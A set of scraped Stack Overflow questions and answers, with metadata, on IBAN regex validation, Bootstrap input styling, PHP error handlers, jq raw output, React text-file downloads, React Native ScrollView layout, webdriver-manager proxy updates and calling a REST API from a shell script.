[A-Z]{2}\d{2} ?\d{4} ?\d{4} ?\d{4} ?\d{4} ?[\d]{0,2}
Try it on regex101
Explanation
*
*[A-Z]{2}\d{2} ? 2 capital letters followed by 2 digits (optional space)
*\d{4} ? 4 digits, repeated 4 times (optional space)
*[\d]{0,2} 0 to 2 digits
| Q: IBAN Regex design Help me please to design Regex that will match all IBANs with all possible whitespaces. Because I've found that one, but it does not work with whitespaces.
[a-zA-Z]{2}[0-9]{2}[a-zA-Z0-9]{4}[0-9]{7}([a-zA-Z0-9]?){0,16}
I need at least that formats:
DE89 3704 0044 0532 0130 00
AT61 1904 3002 3457 3201
FR14 2004 1010 0505 0001 3
A: Here is a suggestion that may works for the patterns you provided:
[A-Z]{2}\d{2} ?\d{4} ?\d{4} ?\d{4} ?\d{4} ?[\d]{0,2}
Try it on regex101
Explanation
*
*[A-Z]{2}\d{2} ? 2 capital letters followed by 2 digits (optional space)
*\d{4} ? 4 digits, repeated 4 times (optional space)
*[\d]{0,2} 0 to 2 digits
A: Just to find the example IBAN's from those countries in a text :
Start with 2 letters then 2 digits.
Then allow a space before every 4 digits, optionally ending with 1 or 2 digits:
\b[A-Z]{2}[0-9]{2}(?:[ ]?[0-9]{4}){4}(?!(?:[ ]?[0-9]){3})(?:[ ]?[0-9]{1,2})?\b
regex101 test here
Note that if the intention is to validate a complete string, that the regex can be simplified.
Since the negative look-ahead (?!...) won't be needed then.
And the word boundaries \b can be replaced by the start ^ and end $ of the line.
^[A-Z]{2}[0-9]{2}(?:[ ]?[0-9]{4}){4}(?:[ ]?[0-9]{1,2})?$
Also, it can be simplified even more if having the 4 groups of 4 connected digits doesn't really matter.
^[A-Z]{2}(?:[ ]?[0-9]){18,20}$
Extra
If you need to match an IBAN number from accross the world?
Then the BBAN part of the IBAN is allowed to have up to 30 numbers or uppercase letters. Reference
And can be written with either spaces or dashes or nothing in between.
For example: CC12-XXXX-12XX-1234-5678-9012-3456-7890-123
So the regex pattern to match a complete string with a long IBAN becomes a bit longer.
^([A-Z]{2}[ \-]?[0-9]{2})(?=(?:[ \-]?[A-Z0-9]){9,30}$)((?:[ \-]?[A-Z0-9]{3,5}){2,7})([ \-]?[A-Z0-9]{1,3})?$
regex101 test here
Also note, that a pure regex solution can't do calculations.
So to actually validate an IBAN number then extra code is required.
Example Javascript Snippet:
function smellsLikeIban(str){
return /^([A-Z]{2}[ \-]?[0-9]{2})(?=(?:[ \-]?[A-Z0-9]){9,30}$)((?:[ \-]?[A-Z0-9]{3,5}){2,7})([ \-]?[A-Z0-9]{1,3})?$/.test(str);
}
function validateIbanChecksum(iban) {
const ibanStripped = iban.replace(/[^A-Z0-9]+/gi,'') //keep numbers and letters only
.toUpperCase(); //calculation expects upper-case
const m = ibanStripped.match(/^([A-Z]{2})([0-9]{2})([A-Z0-9]{9,30})$/);
if(!m) return false;
const numbericed = (m[3] + m[1] + m[2]).replace(/[A-Z]/g,function(ch){
//replace upper-case characters by numbers 10 to 35
return (ch.charCodeAt(0)-55);
});
//The resulting number would be to long for javascript to handle without loosing precision.
//So the trick is to chop the string up in smaller parts.
const mod97 = numbericed.match(/\d{1,7}/g)
.reduce(function(total, curr){ return Number(total + curr)%97},'');
return (mod97 === 1);
};
var arr = [
'DE89 3704 0044 0532 0130 00', // ok
'AT61 1904 3002 3457 3201', // ok
'FR14 2004 1010 0505 0001 3', // wrong checksum
'GB82-WEST-1234-5698-7654-32', // ok
'NL20INGB0001234567', // ok
'XX00 1234 5678 9012 3456 7890 1234 5678 90', // only smells ok
'YY00123456789012345678901234567890', // only smells ok
'NL20-ING-B0-00-12-34-567', // stinks, but still a valid checksum
'XX22YYY1234567890123', // wrong checksum again
'[email protected]' // This Is Not The IBAN You Are Looking For
];
arr.forEach(function (str) {
console.log('['+ str +'] Smells Like IBAN: '+ smellsLikeIban(str));
console.log('['+ str +'] Valid IBAN Checksum: '+ validateIbanChecksum(str))
});
A: You can use a regex like this:
^[A-Z]{2}\d{2} (?:\d{4} ){3}\d{4}(?: \d\d?)?$
Working demo
This will match only those string formats
A: It's probably best to look up the specifications for a correct IBAN number. But if you want to have a regex similar to your existing one, but with spaces, you can use the following one:
^[a-zA-Z]{2}[0-9]{2}\s?[a-zA-Z0-9]{4}\s?[0-9]{4}\s?[0-9]{3}([a-zA-Z0-9]\s?[a-zA-Z0-9]{0,4}\s?[a-zA-Z0-9]{0,4}\s?[a-zA-Z0-9]{0,4}\s?[a-zA-Z0-9]{0,3})?$
Here is a live example: https://regex101.com/r/ZyIPLD/1
| stackoverflow | {
"language": "en",
"length": 567,
"provenance": "stackexchange_0000F.jsonl.gz:901377",
"question_score": "22",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656264"
} |
de298bd05cd2e473a59e73279969ee2ffb0b54c1 | Stackoverflow Stackexchange
Q: how to change bootstrap input text box style to line? I am working in laravel with bootstarp css. now I need change input text box style to line....
this is My bootstrap input text box
<div class="form-group{{ $errors->has('name') ? ' has-error' : '' }}">
<label for="name" class="control-label">Name</label>
<input type="text" name="name" class="form-control" id="name" value="{{ old('name') ?: '' }}">
@if ($errors->has('name'))
<span class="help-block">{{ $errors->first('name') }}</span>
@endif
</div>
I wrote css file as follow
#input {
background: transparent;
border: none;
border-bottom: 1px solid #000000;
}
line is come but bootstrap input box style is still there. how can remove bootstrap style and make My input box as line
A: input is targeting an id named input(which I don't see in your code).
You need to target input itself by removing the #, or... change #input to #name since that is the actual id.
| Q: how to change bootstrap input text box style to line? I am working in laravel with bootstarp css. now I need change input text box style to line....
this is My bootstrap input text box
<div class="form-group{{ $errors->has('name') ? ' has-error' : '' }}">
<label for="name" class="control-label">Name</label>
<input type="text" name="name" class="form-control" id="name" value="{{ old('name') ?: '' }}">
@if ($errors->has('name'))
<span class="help-block">{{ $errors->first('name') }}</span>
@endif
</div>
I wrote css file as follow
#input {
background: transparent;
border: none;
border-bottom: 1px solid #000000;
}
line is come but bootstrap input box style is still there. how can remove bootstrap style and make My input box as line
A: input is targeting an id named input(which I don't see in your code).
You need to target input itself by removing the #, or... change #input to #name since that is the actual id.
A: Try this:
html {
/* for demo purposes only */
margin: 2em;
}
input[type="text"],
select.form-control {
background: transparent;
border: none;
border-bottom: 1px solid #000000;
-webkit-box-shadow: none;
box-shadow: none;
border-radius: 0;
}
input[type="text"]:focus,
select.form-control:focus {
-webkit-box-shadow: none;
box-shadow: none;
}
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<div class="form-group">
<label for="name" class="control-label">Name</label>
<input type="text" name="name" class="form-control" id="name" value="test">
</div>
<div class="form-group">
<label for="dropdown-test" class="control-label">Dropdown test</label>
<select class="form-control" name="dropdown-test">
<option>1</option>
<option>2</option>
<option>3</option>
<option>4</option>
<option>5</option>
</select>
</div>
The :focus rule is so that only the underline changes colour when the input control is focused, otherwise you'll still see the default blow 'glow'.
A: Change #input in css to #name.In your html the id for input is gives as name
#name {
background: transparent;
border: none;
border-bottom: 1px solid #000000;
outline:none;
box-shadow:none;
}
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"/>
<div class="form-group ">
<label for="name" class="control-label">Name</label>
<input type="text" name="name" class="form-control" id="name" value="">
</div>
| stackoverflow | {
"language": "en",
"length": 285,
"provenance": "stackexchange_0000F.jsonl.gz:901380",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656269"
} |
4864887a6ed55e8d1cf0b02b4a11ceeeeeeae361 | Stackoverflow Stackexchange
Q: PHP: set_error_handler and visibily In my class constructor, I have the following:
set_error_handler(array(
$this,
'_custom_error_handler'
));
In the same class, I have the following method defined:
protected function _custom_error_handler($error_number, $error_string, $error_file, $error_line)
When something in my code runs into an error, I get the following warning:
Warning: Invalid callback ... _custom_error_handler, cannot access protected method
Why can't this class (or its children?) access this protected method? Shouldn't a protected method be accessible???
A: A protected method is only accessible from inside the class, or subclasses.
In this case set_error_handler is calling a method, and set_error_handler is outside your class. Therefore it must be public.
| Q: PHP: set_error_handler and visibily In my class constructor, I have the following:
set_error_handler(array(
$this,
'_custom_error_handler'
));
In the same class, I have the following method defined:
protected function _custom_error_handler($error_number, $error_string, $error_file, $error_line)
When something in my code runs into an error, I get the following warning:
Warning: Invalid callback ... _custom_error_handler, cannot access protected method
Why can't this class (or its children?) access this protected method? Shouldn't a protected method be accessible???
A: A protected method is only accessible from inside the class, or subclasses.
In this case set_error_handler is calling a method, and set_error_handler is outside your class. Therefore it must be public.
| stackoverflow | {
"language": "en",
"length": 105,
"provenance": "stackexchange_0000F.jsonl.gz:901400",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656352"
} |
df1309978bee008c08c8d9c488425e90a853b381 | Stackoverflow Stackexchange
Q: How to remove double-quotes in jq output for parsing json files in bash? I'm using jq to parse a JSON file as shown here. However, the results for string values contain the "double-quotes" as expected, as shown below:
$ cat json.txt | jq '.name'
"Google"
How can I pipe this into another command to remove the ""? so I get
$ cat json.txt | jq '.name' | some_other_command
Google
What some_other_command can I use?
A: So for a file containing just {"name": "Google"} then yes
sample='{"name":"Google"}'
echo $sample| jq '.name'
"Google"
using --raw-input helps
echo $sample| jq --raw-output '.name'
Google
But I stumbled upon this question because I was using --raw-output on a json array like this
sample='[{"name":"Yahoo"},{"name":"Google"}]'
echo $sample | jq --raw-output 'map(.name)'
[
"Yahoo",
"Google"
]
And I didn't understand why the quotes remained. I came across this post, and now I know adding | .[] does the trick!
echo $sample | jq --raw-output 'map(.name)| .[]'
Yahoo
Google
| Q: How to remove double-quotes in jq output for parsing json files in bash? I'm using jq to parse a JSON file as shown here. However, the results for string values contain the "double-quotes" as expected, as shown below:
$ cat json.txt | jq '.name'
"Google"
How can I pipe this into another command to remove the ""? so I get
$ cat json.txt | jq '.name' | some_other_command
Google
What some_other_command can I use?
A: So for a file containing just {"name": "Google"} then yes
sample='{"name":"Google"}'
echo $sample| jq '.name'
"Google"
using --raw-input helps
echo $sample| jq --raw-output '.name'
Google
But I stumbled upon this question because I was using --raw-output on a json array like this
sample='[{"name":"Yahoo"},{"name":"Google"}]'
echo $sample | jq --raw-output 'map(.name)'
[
"Yahoo",
"Google"
]
And I didn't understand why the quotes remained. I came across this post, and now I know adding | .[] does the trick!
echo $sample | jq --raw-output 'map(.name)| .[]'
Yahoo
Google
A: Use the -r (or --raw-output) option to emit raw strings as output:
jq -r '.name' <json.txt
| stackoverflow | {
"language": "en",
"length": 178,
"provenance": "stackexchange_0000F.jsonl.gz:901448",
"question_score": "574",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656515"
} |
1fe30b5e8d8521da346cd7a647e45f2941cb0869 | Stackoverflow Stackexchange
Q: Download a string as .txt file in React I have a string which needs to be downloaded in a txt file when click on a button. How can this be implemented using React?
A: Here's a working example. Enter the text in the input field and click Download txt, this will download a txt with the contents you entered in the input.
This solution creates a new Blob object of the text MIME type and attaches it to the href of a temporary anchor (<a>) element which is then triggered programmatically.
A Blob object represents a file-like object of immutable, raw data. Blobs represent data that isn't necessarily in a JavaScript-native format.
class MyApp extends React.Component {
downloadTxtFile = () => {
const element = document.createElement("a");
const file = new Blob([document.getElementById('myInput').value], {type: 'text/plain'});
element.href = URL.createObjectURL(file);
element.download = "myFile.txt";
document.body.appendChild(element); // Required for this to work in FireFox
element.click();
}
render() {
return (
<div>
<input id="myInput" />
<button onClick={this.downloadTxtFile}>Download txt</button>
</div>
);
}
}
ReactDOM.render(<MyApp />, document.getElementById("myApp"));
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/15.1.0/react.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/15.1.0/react-dom.min.js"></script>
<div id="myApp"></div>
This answer was derived from thanhpk's post.
| Q: Download a string as .txt file in React I have a string which needs to be downloaded in a txt file when click on a button. How can this be implemented using React?
A: Here's a working example. Enter the text in the input field and click Download txt, this will download a txt with the contents you entered in the input.
This solution creates a new Blob object of the text MIME type and attaches it to the href of a temporary anchor (<a>) element which is then triggered programmatically.
A Blob object represents a file-like object of immutable, raw data. Blobs represent data that isn't necessarily in a JavaScript-native format.
class MyApp extends React.Component {
downloadTxtFile = () => {
const element = document.createElement("a");
const file = new Blob([document.getElementById('myInput').value], {type: 'text/plain'});
element.href = URL.createObjectURL(file);
element.download = "myFile.txt";
document.body.appendChild(element); // Required for this to work in FireFox
element.click();
}
render() {
return (
<div>
<input id="myInput" />
<button onClick={this.downloadTxtFile}>Download txt</button>
</div>
);
}
}
ReactDOM.render(<MyApp />, document.getElementById("myApp"));
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/15.1.0/react.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/15.1.0/react-dom.min.js"></script>
<div id="myApp"></div>
This answer was derived from thanhpk's post.
| stackoverflow | {
"language": "en",
"length": 182,
"provenance": "stackexchange_0000F.jsonl.gz:901476",
"question_score": "35",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656610"
} |
24b1849e9e3075fe6610fc6015e22c4bdc619174 | Stackoverflow Stackexchange
Q: Align Button to Bottom in ScrollView I'm trying to align a button to bottom of the ScrollView and make the ScrollView fill the page. First screenshot is how it looks like and the second one is what I want.
In the screenshots, ScrollView is not used since there aren't enough items but number of items inside of the ScrollView is not fixed.
Render():
<ScrollView style={styles.scrollViewContainer}>
<View style={{flex: 1, justifyContent: 'space-between', flexDirection: 'column'}}>
<View style={{flex: 1}}>
<Text style={styles.bigTitle}>Title</Text>
<View style={styles.formContainer}>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
</View>
</View>
<SignupButton onPress={this.submit} title="Next Step" image={require("../Images/right_btn.png")} boldText={true} />
</View>
</ScrollView>
Style:
scrollViewContainer: {
backgroundColor: '#fff',
},
formContainer: {
paddingTop: 10,
paddingLeft: 50,
paddingRight: 50,
paddingBottom: 30,
},
bigTitle: {
fontSize: 24,
textAlign: 'center',
marginTop: 20,
marginBottom: 20,
},
A: You can check my answer on similar question. Here is the link.
How to make component stick to bottom in ScrollView but still alow other content to push it down
| Q: Align Button to Bottom in ScrollView I'm trying to align a button to bottom of the ScrollView and make the ScrollView fill the page. First screenshot is how it looks like and the second one is what I want.
In the screenshots, ScrollView is not used since there aren't enough items but number of items inside of the ScrollView is not fixed.
Render():
<ScrollView style={styles.scrollViewContainer}>
<View style={{flex: 1, justifyContent: 'space-between', flexDirection: 'column'}}>
<View style={{flex: 1}}>
<Text style={styles.bigTitle}>Title</Text>
<View style={styles.formContainer}>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
</View>
</View>
<SignupButton onPress={this.submit} title="Next Step" image={require("../Images/right_btn.png")} boldText={true} />
</View>
</ScrollView>
Style:
scrollViewContainer: {
backgroundColor: '#fff',
},
formContainer: {
paddingTop: 10,
paddingLeft: 50,
paddingRight: 50,
paddingBottom: 30,
},
bigTitle: {
fontSize: 24,
textAlign: 'center',
marginTop: 20,
marginBottom: 20,
},
A: You can check my answer on similar question. Here is the link.
How to make component stick to bottom in ScrollView but still alow other content to push it down
A: Try adding justifyContent:'space-between' and flex:1 to contentContainerStyle to ScrollView
<ScrollView style={style.container} contentContainerStyle={[{flex:1,justifyContent:'space-between'}]} >
<LIST />
<Button />
</ScrollView>
A: Here you go just take it out of the ScrollView and make sure that it's at the bottom, if your parent is Relativeandroid:layout_alignParentBottom="true"
to your SignUpbutton, if it's a LinearLayout make sure this is the last View in the xml and that the LinearLayout's height is filling the screen, If it's FrameLayout then I believe you need to use gravity set to bottom :)
<SomeLayout>
<ScrollView style={styles.scrollViewContainer}>
<View style={{flex: 1, justifyContent: 'space-between', flexDirection: 'column'}}>
<View style={{flex: 1}}>
<Text style={styles.bigTitle}>Title</Text>
<View style={styles.formContainer}>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
</View>
</View>
</View>
</ScrollView>
<SignupButton onPress={this.submit} title="Next Step" image={require("../Images/right_btn.png")} boldText={true} />
</SomeLayout>
SomeLayout is a RelativeLayout or LinearLayout or any other Layout your using...
| stackoverflow | {
"language": "en",
"length": 297,
"provenance": "stackexchange_0000F.jsonl.gz:901514",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656712"
} |
3e3430bff8bba3279cd3a2fa1b2c21c769f48f62 | Stackoverflow Stackexchange
Q: webdriver manager update throws unhandled error I am using protractor and webdriver, when trying to do an update on webdriver manager I get the error below.
> webdriver-manager update events.js:160
> throw er; // Unhandled 'error' event
> ^
>
> Error: tunneling socket could not be established, statusCode=407
> at ClientRequest.onConnect (\\hermes\vhd_profiles\VDI_Home_VHD1\modisej\AppData\Roaming\npm\node_modules\protractor\node_modules\tunnel-agent\index.js:166:19)
> at ClientRequest.g (events.js:292:16)
> at emitThree (events.js:116:13)
> at ClientRequest.emit (events.js:194:7)
> at Socket.socketOnData (_http_client.js:394:11)
> at emitOne (events.js:96:13)
> at Socket.emit (events.js:188:7)
> at readableAddChunk (_stream_readable.js:176:18)
> at Socket.Readable.push (_stream_readable.js:134:10)
> at TCP.onread (net.js:551:20)
when I check the list of current available drivers using webdriver-manager status, i get the below.
$ webdriver-manager status
I/status - selenium standalone is not present
I/status - chromedriver is not present
I/status - geckodriver is not present
I/status - IEDriverServer is not present
I/status - android-sdk is not present
I/status - appium is not present
But see the following when finding webdriver-manager version:
webdriver-manager version
I/version - webdriver-manager 12.0.6
Node Version: 7.2.1
Protractor version: 5.1.2
Webdriver version: 12.0.6
A: webdriver-manager update --proxy=http://proxy:88
This solved my issue.
| Q: webdriver manager update throws unhandled error I am using protractor and webdriver, when trying to do an update on webdriver manager I get the error below.
> webdriver-manager update events.js:160
> throw er; // Unhandled 'error' event
> ^
>
> Error: tunneling socket could not be established, statusCode=407
> at ClientRequest.onConnect (\\hermes\vhd_profiles\VDI_Home_VHD1\modisej\AppData\Roaming\npm\node_modules\protractor\node_modules\tunnel-agent\index.js:166:19)
> at ClientRequest.g (events.js:292:16)
> at emitThree (events.js:116:13)
> at ClientRequest.emit (events.js:194:7)
> at Socket.socketOnData (_http_client.js:394:11)
> at emitOne (events.js:96:13)
> at Socket.emit (events.js:188:7)
> at readableAddChunk (_stream_readable.js:176:18)
> at Socket.Readable.push (_stream_readable.js:134:10)
> at TCP.onread (net.js:551:20)
when I check the list of current available drivers using webdriver-manager status, i get the below.
$ webdriver-manager status
I/status - selenium standalone is not present
I/status - chromedriver is not present
I/status - geckodriver is not present
I/status - IEDriverServer is not present
I/status - android-sdk is not present
I/status - appium is not present
But see the following when finding webdriver-manager version:
webdriver-manager version
I/version - webdriver-manager 12.0.6
Node Version: 7.2.1
Protractor version: 5.1.2
Webdriver version: 12.0.6
A: webdriver-manager update --proxy=http://proxy:88
This solved my issue.
A: managed to solve this by running the command
webdriver-manager update --proxy="proxy address":8080/
A: Try this,
webdriver-manager update --proxy="http://username:pass@yourproxyserver:port/" --ignore_ssl
worked for me with this command.
Update
With Chrome version
webdriver-manager update --versions.chrome 77.0.3865.90 --proxy="http://username:pass@yourproxyserver:port/" --ignore_ssl
A: Running the command
webdriver-manager update --proxy=http://proxy:88
[16:55:30] I/config_source - curl -o/usr/local/lib/node_modules/protractor/node_modules/webdriver-manager/selenium/gecko-response.json 'http://proxy:88/repos/mozilla/geckodriver/releases' -H 'host:api.github.com'
events.js:174
throw er; // Unhandled 'error' event
^
Error: connect ETIMEDOUT 198.105.254.104:88
| stackoverflow | {
"language": "en",
"length": 240,
"provenance": "stackexchange_0000F.jsonl.gz:901526",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656759"
} |
9113b32751acee10582a4a44661fe2e2f9564523 | Stackoverflow Stackexchange
Q: $null/empty interactive vs script difference Why do the following 3 lines run without error from the PowerShell prompt, but return an error when run in a script (foo.ps1)? In both cases, $b -eq $null returns $true and $b.GetType() returns an error for invoking on $null, but there is something different about the $b in the interactive session.
$a = 1,2,3
[array]$b = $a | where {$false}
$b | where {$_.GetType()}
When run as script, the last line returns
You cannot call a method on a null valued expression.
I ran into this during ill-fated attempts to prevent array unrolling. Removing [array] makes the error go away, and I'll move on to trying to better understand the unrolling rules (I want $b to be an empty array, not $null), but I'd like to understand the reason for the difference here.
A: There is a perfect explanation
*By typing [array] you tell the variable to be strongly typed. I suspect this line in .NET code, triggers the exception as it needs a type as a variable...
http://referencesource.microsoft.com/#mscorlib/system/array.cs,72
| Q: $null/empty interactive vs script difference Why do the following 3 lines run without error from the PowerShell prompt, but return an error when run in a script (foo.ps1)? In both cases, $b -eq $null returns $true and $b.GetType() returns an error for invoking on $null, but there is something different about the $b in the interactive session.
$a = 1,2,3
[array]$b = $a | where {$false}
$b | where {$_.GetType()}
When run as script, the last line returns
You cannot call a method on a null valued expression.
I ran into this during ill-fated attempts to prevent array unrolling. Removing [array] makes the error go away, and I'll move on to trying to better understand the unrolling rules (I want $b to be an empty array, not $null), but I'd like to understand the reason for the difference here.
A: There is a perfect explanation
*By typing [array] you tell the variable to be strongly typed. I suspect this line in .NET code, triggers the exception as it needs a type as a variable...
http://referencesource.microsoft.com/#mscorlib/system/array.cs,72
A: If you're running this from the ISE or from interactive, the variables are being saved. In your examples, I'm not sure why you're using Where-Object instead of %/ForEach-Object. Working on what I think you're attempting to do:
$a = @(1, 2, 3)
[Array]$b
$a | % { $b += $_ }
$b | % { $_.GetType() }
| stackoverflow | {
"language": "en",
"length": 234,
"provenance": "stackexchange_0000F.jsonl.gz:901562",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656872"
} |
6742efc342f32595d8e1ee0bfc6f8878f9cd64b6 | Stackoverflow Stackexchange
Q: How to call restapi in .sh file I am trying to create a script to call restapi endpoint but I am getting "bad substitution" error.
Here is my script:
vi script.sh
echo "welcome to the script"
echo ${"http://web-integ000/sampleProject/getProductList"}
but when I execute the curl command at commandline it worked.I used the following command
$ curl -H "Accept:application/json" http://web-integ000/sampleProject/getProductList
and I got the following output:
[ {
"productId" : "u1604028-5948abd0-0",
"prodcutName":"H1ACX",
"calendarDate" : "2017-06-20"
}
]timeStamp:1497968810
How to get the response from the restapi using script?
A: $ evaluates a shell command or environment variable. A URL cannot be evaluated by the OS natively, so you should use the curl command for it, e.g.:
VAR1=${curl ....}
You can then use the variable, e.g. echo it.
| Q: How to call restapi in .sh file I am trying to create a script to call restapi endpoint but I am getting "bad substitution" error.
Here is my script:
vi script.sh
echo "welcome to the script"
echo ${"http://web-integ000/sampleProject/getProductList"}
but when I execute the curl command at commandline it worked.I used the following command
$ curl -H "Accept:application/json" http://web-integ000/sampleProject/getProductList
and I got the following output:
[ {
"productId" : "u1604028-5948abd0-0",
"prodcutName":"H1ACX",
"calendarDate" : "2017-06-20"
}
]timeStamp:1497968810
How to get the response from the restapi using script?
A: $ evaluates a shell command or environment variable. A URL cannot be evaluated by the OS natively, so you should use the curl command for it, e.g.:
VAR1=${curl ....}
You can then use the variable, e.g. echo it.
A: You can use a simple curl command to get the response from the server as follows:-
rest.sh
result=$(curl -X GET --header "Accept: */*" "http://localhost:9090/employees")
echo "Response from server"
echo $result
exit
Hope it works! Thanks!
| stackoverflow | {
"language": "en",
"length": 161,
"provenance": "stackexchange_0000F.jsonl.gz:901568",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656893"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.